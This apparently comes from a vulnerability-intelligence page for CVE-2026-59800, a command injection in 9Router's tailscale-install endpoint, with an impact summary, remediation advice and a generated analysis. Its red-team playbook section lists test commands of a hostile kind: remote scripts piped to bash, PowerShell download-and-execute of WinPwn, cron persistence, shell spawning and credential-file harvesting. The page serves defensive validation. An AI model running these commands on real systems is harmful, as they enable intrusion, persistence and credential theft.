CVE-2026-59800
Overview
This vulnerability is an OS command injection caused by improper handling of input in the unauthenticated POST /api/tunnel/tailscale-install endpoint of 9Router. The sudoPassword parameter from the request body is directly passed to the stdin of a 'sudo -S sh' child process without validation or sanitization. The affected component is the tailscale-install API route, which lacks authorization checks due to exclusion from the dashboard middleware matcher.
Vulnerability Description
9Router before 0.4.44 contains an OS command injection vulnerability in the unauthenticated POST /api/tunnel/tailscale-install endpoint (this route is not covered by the dashboard middleware matcher, so no authorization check is applied). The sudoPassword field from the request body is written to the stdin of a 'sudo -S sh' child process. When sudo does not prompt for a password (the process runs as root, NOPASSWD is configured, or a recent sudo timestamp cache exists), the sudoPassword value is interpreted by sh as a shell command, allowing a remote unauthenticated attacker to execute arbitrary OS commands. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-07-04 (UTC).
Impact
An unauthenticated attacker can execute arbitrary operating system commands on the affected 9Router device without any user interaction or credentials. This enables full system compromise, including potential data exfiltration, service disruption, or lateral movement within the network. The vulnerability allows attackers to bypass normal security controls by leveraging the sudoPassword parameter to inject shell commands, resulting in complete control over the device.
Solution
Upgrade 9Router to version 0.4.44 or later as detailed in the vendor advisory at https://github.com/decolua/9router/security/advisories/GHSA-g6g7-pvmx-m74p. The vendor has patched the command injection flaw in the tailscale-install endpoint by enforcing proper input handling and authorization checks. Administrators should apply the update promptly to mitigate this critical vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is characterized by an OS command injection flaw that exists within the unauthenticated POST /api/tunnel/tailscale-install endpoint of a specific router software version. This endpoint lacks proper authorization checks due to its exclusion from the dashboard middleware matcher, allowing any unauthenticated user to send requests. The crux of the issue lies in how the sudoPassword field from the request body is processed. When this field is passed to a child process executing 'sudo -S sh', it can be interpreted as a shell command if certain conditions are met, such as the absence of a password prompt due to the NOPASSWD configuration or an active sudo timestamp cache. This flaw enables an attacker to execute arbitrary commands on the operating system with root privileges, posing a significant security risk.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious POST request to the vulnerable endpoint, embedding OS commands within the sudoPassword field. If the target system is configured to allow passwordless sudo access or has a valid sudo timestamp, the attacker can execute commands without any authentication barriers. This could lead to a range of malicious activities, including but not limited to data exfiltration, system manipulation, or the installation of additional malware. The simplicity of the attack, combined with the lack of required authentication, makes it particularly concerning for organizations that rely on the affected router software.
The potential real-world impact of this vulnerability is profound. Organizations utilizing the affected router software could face severe operational disruptions, data breaches, or unauthorized access to sensitive systems. The ability for an attacker to execute arbitrary commands as a root user means that they could compromise the integrity and confidentiality of the entire system. The business risks associated with such an incident are multifaceted, including financial losses, reputational damage, and potential legal ramifications stemming from data protection regulations. Furthermore, the high CVSS score of 9.8 indicates a critical level of severity, emphasizing the urgency for organizations to address this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to update the router software to the latest version that addresses this flaw, thereby eliminating the vulnerability at its source. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any instances of this vulnerability in their environment. Monitoring network traffic for unusual POST requests to the vulnerable endpoint can also aid in early detection of exploitation attempts. Furthermore, employing strict access controls and ensuring that sudo configurations do not allow passwordless execution can significantly reduce the risk of exploitation. Organizations should also consider implementing application firewalls to filter out malicious requests targeting the vulnerable endpoint.
In conclusion, the OS command injection vulnerability presents a critical threat to systems utilizing the affected router software. Its exploitation can lead to severe consequences, including unauthorized access and control over systems. Organizations must prioritize detection and mitigation efforts to safeguard their infrastructure and sensitive data from potential attacks. By staying informed about vulnerabilities and implementing robust security measures, organizations can better protect themselves against the evolving landscape of cyber threats.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: decolua, product: 9router
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-59800 |
| github.com |
GitHub CVE
vendor-advisory
|
https://github.com/decolua/9router/security/advisories/GHSA-g6g7-pvmx-m74p |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/9router-os-command-injection-via-sudopassword-parameter-in-tailscale-install-endpoint |